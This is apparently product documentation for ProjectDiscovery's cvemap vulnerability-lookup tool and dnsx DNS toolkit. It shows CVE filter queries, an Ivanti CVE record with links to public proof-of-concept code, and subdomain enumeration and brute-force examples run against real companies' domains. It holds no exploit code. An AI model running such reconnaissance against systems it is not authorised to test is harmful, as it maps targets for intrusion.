$ cvemap -silent -cs '> 7' -es '> 0.00053' -l 5
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE |
|---------------|------|----------|---------|---------------------------------------|----------|
| CVE-2023-5860 | 7.2 | HIGH | 0.00132 | | ❌ |
| CVE-2023-5843 | 9 | CRITICAL | 0.00053 | | ❌ |
| CVE-2023-5807 | 9.8 | CRITICAL | 0.00076 | education_portal | ❌ |
| CVE-2023-5804 | 9.8 | CRITICAL | 0.00063 | nipah_virus_testing_management_system | ❌ |
| CVE-2023-5802 | 8.8 | HIGH | 0.00058 | wp_knowledgebase | ❌ |
```
To filter CVEs matching specific conditions, such as CVEs that have a public PoC but no template and are in the KEV list, the options below can be used:
```bash
$ cvemap -silent -template=false -poc=true -kev=true -l 5 -f poc,kev
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE | POC | KEV |
|----------------|------|----------|---------|---------|----------|------|------|
| CVE-2023-5631 | 5.4 | MEDIUM | 0.00986 | webmail | ❌ | TRUE | TRUE |
| CVE-2023-5217 | 8.8 | HIGH | 0.26047 | libvpx | ❌ | TRUE | TRUE |
| CVE-2023-4863 | 8.8 | HIGH | 0.4101 | chrome | ❌ | TRUE | TRUE |
| CVE-2023-44487 | 7.5 | HIGH | 0.52748 | http | ❌ | TRUE | TRUE |
| CVE-2023-41993 | 9.8 | CRITICAL | 0.00617 | safari | ❌ | TRUE | TRUE |
```
### Return CVE IDs only
To return only CVE IDs, the `-lsi` or `-list-id` flag can be used along with any existing cvemap filter or search.
```bash
cvemap -kev -limit 10 -list-id
CVE-2024-21887
CVE-2024-0519
CVE-2023-7101
CVE-2023-7024
CVE-2023-6549
CVE-2023-6548
CVE-2023-6448
CVE-2023-6345
CVE-2023-5631
CVE-2023-5217
```
### JSON Output
```bash
$ echo CVE-2024-21887 | cvemap -json
```
```json
[
{
"cve_id": "CVE-2024-21887",
"cve_description": "A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.",
"severity": "critical",
"cvss_score": 9.1,
"cvss_metrics": {
"cvss30": {
"score": 9.1,
"vector": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"severity": "critical"
},
"cvss31": {
"score": 9.1,
"vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"severity": "critical"
}
},
"weaknesses": [
{
"cwe_id": "CWE-77",
"cwe_name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')"
}
],
"epss": {
"epss_score": 0.95688,
"epss_percentile": 0.99289
},
"cpe": {
"cpe": "cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*",
"vendor": "ivanti",
"product": "connect_secure"
},
"reference": [
"http://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html"
],
"poc": [
{
"url": "https://github.com/tucommenceapousser/CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-20T19:15:23Z"
},
{
"url": "https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped",
"source": "gh-nomi-sec",
"added_at": "2024-01-19T08:11:31Z"
},
{
"url": "https://github.com/seajaysec/Ivanti-Connect-Around-Scan",
"source": "gh-nomi-sec",
"added_at": "2024-01-19T02:12:11Z"
},
{
"url": "https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-18T13:25:46Z"
},
{
"url": "https://github.com/TheRedDevil1/Check-Vulns-Script",
"source": "gh-nomi-sec",
"added_at": "2024-01-17T10:29:02Z"
},
{
"url": "https://github.com/Chocapikk/CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-16T20:59:38Z"
},
{
"url": "https://github.com/duy-31/CVE-2023-46805_CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-16T19:40:59Z"
},
{
"url": "https://github.com/rxwx/pulse-meter",
"source": "gh-nomi-sec",
"added_at": "2024-01-16T19:19:52Z"
},
{
"url": "https://github.com/oways/ivanti-CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-14T09:25:56Z"
}
],
"vendor_advisory": "https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US",
"is_template": true,
"nuclei_templates": {
"template_path": "http/cves/2024/CVE-2024-21887.yaml",
"template_url": "https://cloud.projectdiscovery.io/public/CVE-2024-21887",
"created_at": "2024-01-17T02:23:45+05:30",
"updated_at": "2024-01-16T21:14:22Z"
},
"is_exploited": true,
"kev": {
"added_date": "2024-01-10",
"due_date": "2024-01-22"
},
"assignee": "support@hackerone.com",
"published_at": "2024-01-12T17:15:10.017",
"updated_at": "2024-01-22T17:15:09.523",
"hackerone": {
"rank": 6345,
"count": 0
},
"age_in_days": 10,
"vuln_status": "modified",
"is_poc": true,
"is_remote": false,
"is_oss": false,
"vulnerable_cpe": [
"cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r10:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r11:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r11.3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r11.4:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r11.5:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r12:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r12.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r13:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r13.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r14:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r15:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r15.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r16:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r16.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r17:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r17.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r18:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r4:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r4.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r4.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r4.3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r5:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r6:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r7:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r8:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r8.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r8.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r9:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r9.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.1:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.1:r6:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.2:-:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.2:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.3:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.4:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.4:r2.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.5:r2.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.6:-:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.6:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.6:r2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.0:*:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r10:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r11:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r12:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r13:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r13.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r14:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r15:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r16:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r17:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r18:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r3.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r4:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r4.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r4.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r5:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r6:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r7:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r8:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r8.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r8.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r9:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.1:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.1:r6:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.2:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.2:r3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.3:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.3:r3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.4:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.4:r2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.4:r2.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.5:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.5:r2.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.6:r1:*:*:*:*:*:*"
]
}
]
```
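Since the JSON output is a plain array, it composes well with standard tooling. For example, extracting just the EPSS score from the record above with `jq` (assuming `jq` is installed):
```bash
echo CVE-2024-21887 | cvemap -json | jq -r '.[0].epss.epss_score'
# 0.95688
```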
## Advanced Filters
You can combine multiple filters using the `-q` query option. For example:
```bash
cvemap -q '"remote code execution" 2023 is_remote:true is_poc:true sort_asc:age_in_days'
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE | POC | KEV |
|---------------|------|----------|---------|---------|----------|------|------|
| CVE-2023-5631 | 5.4 | MEDIUM | 0.00986 | webmail | ❌ | TRUE | TRUE |
| CVE-2023-5217 | 8.8 | HIGH | 0.26047 | libvpx | ❌ | TRUE | TRUE |
| CVE-2023-4863 | 8.8 | HIGH | 0.4101 | chrome | ❌ | TRUE | TRUE |
| CVE-2023-44487| 7.5 | HIGH | 0.52748 | http | ❌ | TRUE | TRUE |
| CVE-2023-41993| 9.8 | CRITICAL | 0.00617 | safari | ❌ | TRUE | TRUE |
```
You can see the documentation for all available filters below:
### Metadata
* Age of the CVE in days.
* The assignee for this CVE. Typically this is an email address such as `security@apache.org` or `cve@mitre.org`.
* The description of the CVE from the NVD.
* The CVE ID for a specific CVE, such as `CVE-2019-7070`.
* The CVSS v3.0 score for this CVE. Example: `8.8`
* Is the CVE marked as a [Known Exploited Vulnerability (KEV)](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)?
* Is this CVE in open source software with OSS data available?
* Is there a Proof of Concept (POC) available for this CVE?
* Is this CVE remotely exploitable?
* Is there a Nuclei Template available for this CVE?
* The URL for the patch for this CVE. Example: `https://helpx.adobe.com/security/products/acrobat/apsb19-07.html`
* The published date and time for this CVE. Example: `2019-05-24T19:29:02.080`
* The URL reference for this CVE. Example: `https://www.zerodayinitiative.com/advisories/ZDI-19-210/`
* The CVSS v3.0 severity for this CVE. Example: `high`
* The last date and time that this CVE was updated. Example: `2019-08-21T16:20:31.353`
* The URL for the vendor advisory for this CVE.
* The vulnerability status of this CVE. Example: `confirmed`
* The CPE string for this CVE. Example: `cpe:2.3:a:adobe:acrobat_reader_dc:*:*:*:*:continuous:*:*:*`
### CPE Data
Common Platform Enumeration (CPE) Data
* The full Common Platform Enumeration string. Example: `cpe:2.3:a:adobe:acrobat_dc:*:*:*:*:classic:*:*:*`
* Common Platform Enumeration framework. Example: `wordpress`
* Common Platform Enumeration product. Example: `acrobat_dc`
* Common Platform Enumeration vendor. Example: `adobe`
### CVSS Data
Common Vulnerability Scoring System (CVSS) Data
* CVSS v2 score. Example: `9.3`
* CVSS v2 severity. Example: `critical`
* CVSS v2 vector. Example: `CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C`
* CVSS v3.0 score. Example: `8.8`
* CVSS v3.0 severity. Example: `high`
* CVSS v3.0 vector. Example: `CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`
* CVSS v3.1 score. Example: `7`
* CVSS v3.1 severity. Example: `high`
* CVSS v3.1 vector. Example: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`
### EPSS Data
Exploit Prediction Scoring System (EPSS) Data
* The EPSS percentile. Example: `0.80053`
* The EPSS score. Example: `0.00826`
### HackerOne Data
* Number of HackerOne reports for this CVE. Example: `0`
* The HackerOne rank for this CVE. Example: `6279`
### KEV Data
Known Exploited Vulnerability (KEV) Data
* Date added to the KEV. Example: `2022-04-15`
* The KEV due date. Example: `2022-05-06`
### Nuclei Template Data
* Date and time that the Nuclei Template was created. Example: `2020-04-05T23:31:09+05:30`
* The GitHub issue for this template. Example: `https://github.com/projectdiscovery/nuclei-templates/issues/7549`
* The GitHub issue type for this template (has it been mentioned, or has a template been created?). Example: `mention` or `template`
* The full path for this template. Example: `http/cves/2019/CVE-2019-12314.yaml`
* The GitHub pull request for this template. Example: `https://github.com/projectdiscovery/nuclei-templates/pull/3200`
* The public ProjectDiscovery Cloud Platform URL for this template. Example: `https://cloud.projectdiscovery.io/public/CVE-2019-12314`
* Date and time that the Nuclei Template was last updated. Example: `2023-12-29T09:30:44Z`
### Open Source Software (OSS) Data
* Date and time that the OSS repository was created. Example: `2009-05-21 01:33:45 +0000 UTC`
* Description of this software. Example: `Mirror of Apache ActiveMQ`
* The number of forks for this project. Example: `1407`
* The primary programming language of this software. Example: `Java`
* Date and time of the most recent push to this repository. Example: `2023-12-12 17:51:19 +0000 UTC`
* The number of stars for this project. Example: `2221`
* The number of subscribers for this repository. Example: `200`
* The topics for this project. Example: `php`
* Date and time that the project was last updated. Example: `2023-12-29 09:29:55 +0000 UTC`
* The public repository URL. Example: `https://github.com/apache/activemq`
### Proof of Concept (POC) Data
* Date and time that the POC was added. Example: `2019-04-02T12:50:46Z`
* The source of the POC. Example: `trickest`
* The URL of the POC. Example: `https://medium.com/@alt3kx/a-reflected-xss-in-print-archive-system-v2015-release-2-6-cve-2019-10685-b60763b7768b`
### Shodan Data
* Number of Shodan results relative to this CVE.
* The Shodan query for this CVE. Example: `cpe:"cpe:2.3:a:adobe:coldfusion"`
### CWE Data
Common Weakness Enumeration (CWE) Data
* The CWE ID for this CVE. Example: `CWE-416`
* The CWE name for this CVE. Example: `Use After Free`
# cvemap usage
Learn cvemap usage including flags and filters
## Access help
Use `cvemap -h` to display all help options.
## cvemap help options
```
Flags:
CONFIG:
-auth configure projectdiscovery cloud (pdcp) api key
OPTIONS:
-id string[] cve to list for given id
-v, -vendor string[] cve to list for given vendor
-p, -product string[] cve to list for given product
-eproduct string[] cves to exclude based on products
-s, -severity string[] cve to list for given severity
-cs, -cvss-score string[] cve to list for given cvss score
-c, -cpe string cve to list for given cpe
-es, -epss-score string cve to list for given epss score
-ep, -epss-percentile string[] cve to list for given epss percentile
-age string cve to list published by given age in days
-a, -assignee string[] cve to list for given publisher assignee
-vs, -vstatus value cve to list for given vulnerability status in cli output. supported: modified, rejected, unknown, new, confirmed, unconfirmed
UPDATE:
-up, -update update cvemap to latest version
-duc, -disable-update-check disable automatic cvemap update check
FILTER:
-q, -search string search in cve data
-k, -kev display cves marked as exploitable vulnerabilities by cisa (default true)
-t, -template display cves that has public nuclei templates (default true)
-poc display cves that has public published poc (default true)
-h1, -hackerone display cves reported on hackerone (default true)
-re, -remote display remotely exploitable cves (AV:N & PR:N | PR:L) (default true)
OUTPUT:
-f, -field value fields to display in cli output. supported: age, kev, template, poc, cwe, vendor, vstatus, epss, product, assignee
-fe, -exclude value fields to exclude from cli output. supported: age, kev, template, poc, cwe, vendor, vstatus, epss, product, assignee
-lsi, -list-id list only the cve ids in the output
-l, -limit int limit the number of results to display (default 50)
-offset int offset the results to display
-j, -json return output in json format
-epk, -enable-page-keys enable page keys to navigate results
DEBUG:
-version Version
-silent Silent
-verbose Verbose
```
## Notes on usage
* The CVE dataset is updated every 6 hours.
## References
* **[National Vulnerability Database (NVD)](https://nvd.nist.gov/developers)**: Comprehensive CVE vulnerability data.
* **[Known Exploited Vulnerabilities Catalog (KEV)](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)**: Exploited vulnerabilities catalog.
* **[Exploit Prediction Scoring System (EPSS)](https://www.first.org/epss/data_stats)**: Exploit prediction scores.
* **[HackerOne](https://hackerone.com/hacktivity/cve_discovery)**: CVE discoveries disclosure.
* **[Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates)**: Vulnerability validation templates.
* **[Live-Hack-CVE](https://github.com/Live-Hack-CVE/) / [PoC-in-GitHub](https://github.com/nomi-sec/PoC-in-GitHub/)** GitHub repositories: Vulnerability PoC references.
# Installing dnsx
Learn about how to install and get started with dnsx
Enter the command below in a terminal to install ProjectDiscovery's dnsx using Go.
```bash
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest
```
```bash
brew install dnsx
```
Supported in **macOS** (or Linux)
```bash
docker pull projectdiscovery/dnsx:latest
```
```bash
https://github.com/projectdiscovery/dnsx/releases
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
## Installation Notes
* dnsx requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export PATH=$PATH:$HOME/go/bin >> $HOME/.bashrc
source $HOME/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$HOME/go/bin/dnsx`
# dnsx Overview
A fast DNS toolkit for running various probes with multiple features
## What is dnsx?
`dnsx` is a fast and multi-purpose DNS toolkit designed for running various probes through the [retryabledns](https://github.com/projectdiscovery/retryabledns) library.
It supports multiple DNS queries, user-supplied resolvers, DNS wildcard filtering (as in [shuffledns](https://github.com/projectdiscovery/shuffledns)), and more.
## Features and capabilities
* Simple and easy-to-use utility to query DNS records
* **A, AAAA, CNAME, PTR, NS, MX, TXT, SRV, SOA** query support
* DNS **Resolution** / **Brute-force** support
* Custom **resolver** input support
* Multiple resolver format **(TCP/UDP/DOH/DOT)** support
* **stdin** and **stdout** support
* Automatic **wildcard** handling support
## Additional dnsx resources
As an open source tool with a robust community there are a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
* [https://www.geeksforgeeks.org/dnsx-dns-toolkit-allow-to-run-multiple-dns-queries/](https://www.geeksforgeeks.org/dnsx-dns-toolkit-allow-to-run-multiple-dns-queries/)
* [https://www.kitploit.com/2020/11/dnsx-fast-and-multi-purpose-dns-toolkit.html?m=0](https://www.kitploit.com/2020/11/dnsx-fast-and-multi-purpose-dns-toolkit.html?m=0)
* [https://blog.projectdiscovery.io/building-your-own-historical-dns-solution-with-dnsx/](https://blog.projectdiscovery.io/building-your-own-historical-dns-solution-with-dnsx/)
Sharing any external resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
## Support
Questions about using dnsx? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running dnsx
Learn about running dnsx with examples including commands and output
For all of the flags and options available for `dnsx` be sure to check out the [Usage](/tools/dnsx/usage) page. On this page we share examples running `dnsx` with specific flags and goals
and the output you can expect from each.
If you have questions, reach out to us through [Help](/help).
## Basic Examples
### DNS Resolving
Filter active hostnames from the list of passive subdomains, obtained from various sources:
```console
subfinder -silent -d hackerone.com | dnsx -silent
a.ns.hackerone.com
www.hackerone.com
api.hackerone.com
docs.hackerone.com
mta-sts.managed.hackerone.com
mta-sts.hackerone.com
resources.hackerone.com
b.ns.hackerone.com
mta-sts.forwarding.hackerone.com
events.hackerone.com
support.hackerone.com
```
Print **A** records for the given list of subdomains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -a -resp
www.hackerone.com [104.16.100.52]
www.hackerone.com [104.16.99.52]
hackerone.com [104.16.99.52]
hackerone.com [104.16.100.52]
api.hackerone.com [104.16.99.52]
api.hackerone.com [104.16.100.52]
mta-sts.forwarding.hackerone.com [185.199.108.153]
mta-sts.forwarding.hackerone.com [185.199.109.153]
mta-sts.forwarding.hackerone.com [185.199.110.153]
mta-sts.forwarding.hackerone.com [185.199.111.153]
a.ns.hackerone.com [162.159.0.31]
resources.hackerone.com [52.60.160.16]
resources.hackerone.com [3.98.63.202]
resources.hackerone.com [52.60.165.183]
resources.hackerone.com [read.uberflip.com]
mta-sts.hackerone.com [185.199.110.153]
mta-sts.hackerone.com [185.199.111.153]
mta-sts.hackerone.com [185.199.109.153]
mta-sts.hackerone.com [185.199.108.153]
gslink.hackerone.com [13.35.210.17]
gslink.hackerone.com [13.35.210.38]
gslink.hackerone.com [13.35.210.83]
gslink.hackerone.com [13.35.210.19]
b.ns.hackerone.com [162.159.1.31]
docs.hackerone.com [185.199.109.153]
docs.hackerone.com [185.199.110.153]
docs.hackerone.com [185.199.111.153]
docs.hackerone.com [185.199.108.153]
support.hackerone.com [104.16.51.111]
support.hackerone.com [104.16.53.111]
mta-sts.managed.hackerone.com [185.199.108.153]
mta-sts.managed.hackerone.com [185.199.109.153]
mta-sts.managed.hackerone.com [185.199.110.153]
mta-sts.managed.hackerone.com [185.199.111.153]
```
Extract **A** records for the given list of subdomains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -a -resp-only
104.16.99.52
104.16.100.52
162.159.1.31
104.16.99.52
104.16.100.52
185.199.110.153
185.199.111.153
185.199.108.153
185.199.109.153
104.16.99.52
104.16.100.52
104.16.51.111
104.16.53.111
185.199.108.153
185.199.111.153
185.199.110.153
185.199.111.153
```
Extract **CNAME** records for the given list of subdomains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -cname -resp
support.hackerone.com [hackerone.zendesk.com]
resources.hackerone.com [read.uberflip.com]
mta-sts.hackerone.com [hacker0x01.github.io]
mta-sts.forwarding.hackerone.com [hacker0x01.github.io]
events.hackerone.com [whitelabel.bigmarker.com]
```
Extract **ASN** records for the given list of subdomains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -asn
b.ns.hackerone.com [AS13335, CLOUDFLARENET, US]
a.ns.hackerone.com [AS13335, CLOUDFLARENET, US]
hackerone.com [AS13335, CLOUDFLARENET, US]
www.hackerone.com [AS13335, CLOUDFLARENET, US]
api.hackerone.com [AS13335, CLOUDFLARENET, US]
support.hackerone.com [AS13335, CLOUDFLARENET, US]
```
Probe using [dns status code](https://github.com/projectdiscovery/dnsx/wiki/RCODE-ID-VALUE-Mapping) on given list of (sub)domains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -rcode noerror,servfail,refused
ns.hackerone.com [NOERROR]
a.ns.hackerone.com [NOERROR]
b.ns.hackerone.com [NOERROR]
support.hackerone.com [NOERROR]
resources.hackerone.com [NOERROR]
mta-sts.hackerone.com [NOERROR]
www.hackerone.com [NOERROR]
mta-sts.forwarding.hackerone.com [NOERROR]
docs.hackerone.com [NOERROR]
```
Extract subdomains from given network range using `PTR` query:
```console
echo 173.0.84.0/24 | dnsx -silent -resp-only -ptr
cors.api.paypal.com
trinityadminauth.paypal.com
cld-edge-origin-api.paypal.com
appmanagement.paypal.com
svcs.paypal.com
trinitypie-serv.paypal.com
ppn.paypal.com
pointofsale-new.paypal.com
pointofsale.paypal.com
slc-a-origin-pointofsale.paypal.com
fpdbs.paypal.com
```
Extract subdomains from given ASN using `PTR` query:
```console
echo AS17012 | dnsx -silent -resp-only -ptr
apiagw-a.paypal.com
notify.paypal.com
adnormserv-slc-a.paypal.com
a.sandbox.paypal.com
apps2.paypal-labs.com
pilot-payflowpro.paypal.com
www.paypallabs.com
paypal-portal.com
micropayments.paypal-labs.com
minicart.paypal-labs.com
```
***
### DNS Bruteforce
Bruteforce subdomains for a given domain or list of domains using the `-d` and `-w` flags:
```console
dnsx -silent -d facebook.com -w dns_worldlist.txt
blog.facebook.com
booking.facebook.com
api.facebook.com
analytics.facebook.com
beta.facebook.com
apollo.facebook.com
ads.facebook.com
box.facebook.com
alpha.facebook.com
apps.facebook.com
connect.facebook.com
c.facebook.com
careers.facebook.com
code.facebook.com
```
Bruteforce targeted subdomains using single or multiple keyword input, as the `-d` and `-w` flags support file or comma-separated keyword inputs:
```console
dnsx -silent -d domains.txt -w jira,grafana,jenkins
grafana.1688.com
grafana.8x8.vc
grafana.airmap.com
grafana.aerius.nl
jenkins.1688.com
jenkins.airbnb.app
jenkins.airmap.com
jenkins.ahn.nl
jenkins.achmea.nl
jira.amocrm.com
jira.amexgbt.com
jira.amitree.com
jira.arrival.com
jira.atlassian.net
jira.atlassian.com
```
Values are accepted from **stdin** for all the input types (`-list`, `-domain`, `-wordlist`). The `-list` flag defaults to **stdin**, but the same can be achieved for other input types by adding a `-` (dash) as the parameter:
```console
cat domains.txt | dnsx -silent -w jira,grafana,jenkins -d -
grafana.1688.com
grafana.8x8.vc
grafana.airmap.com
grafana.aerius.nl
jenkins.1688.com
jenkins.airbnb.app
jenkins.airmap.com
jenkins.ahn.nl
jenkins.achmea.nl
jira.amocrm.com
jira.amexgbt.com
jira.amitree.com
jira.arrival.com
jira.atlassian.net
jira.atlassian.com
```
#### DNS Bruteforce with Placeholder based wordlist
```bash
$ cat tld.txt
com
by
de
be
al
bi
cg
dj
bs
```
```console
dnsx -d google.FUZZ -w tld.txt -resp
_ __ __
__| | _ __ ___ \ \/ /
/ _' || '_ \ / __| \ /
| (_| || | | |\__ \ / \
\__,_||_| |_||___//_/\_\ v1.1.2
projectdiscovery.io
google.de [142.250.194.99]
google.com [142.250.76.206]
google.be [172.217.27.163]
google.bs [142.251.42.35]
google.bi [216.58.196.67]
google.al [216.58.196.68]
google.by [142.250.195.4]
google.cg [142.250.183.131]
google.dj [142.250.192.3]
```
### Wildcard filtering
A special feature of `dnsx` is its ability to handle **multi-level DNS based wildcards**, and to do so with a greatly reduced number of DNS requests. Sometimes all the subdomains will resolve, which leads to lots of garbage in the output. The way `dnsx` handles this is by keeping track of how many subdomains point to an IP; if the count of subdomains pointing to an IP increases beyond a certain threshold, it will check for wildcards on all the levels of the hosts for that IP iteratively.
```console
dnsx -l subdomain_list.txt -wd airbnb.com -o output.txt
```
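The sensitivity of the wildcard detection can be tuned with the `-wt` / `-wildcard-threshold` flag documented on the usage page (default 5); a lower value filters more aggressively:
```bash
# Treat an IP as wildcard-backed once 3 subdomains resolve to it
dnsx -l subdomain_list.txt -wd airbnb.com -wt 3 -o output.txt
```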
***
### Dnsx as a library
It's possible to use the library directly in your Go programs. The following code snippet is an example of its use in Go programs. Please refer to [here](https://pkg.go.dev/github.com/projectdiscovery/dnsx@v1.1.0/libs/dnsx) for detailed package configuration and usage.
```go
package main

import (
	"fmt"

	"github.com/projectdiscovery/dnsx/libs/dnsx"
)

func main() {
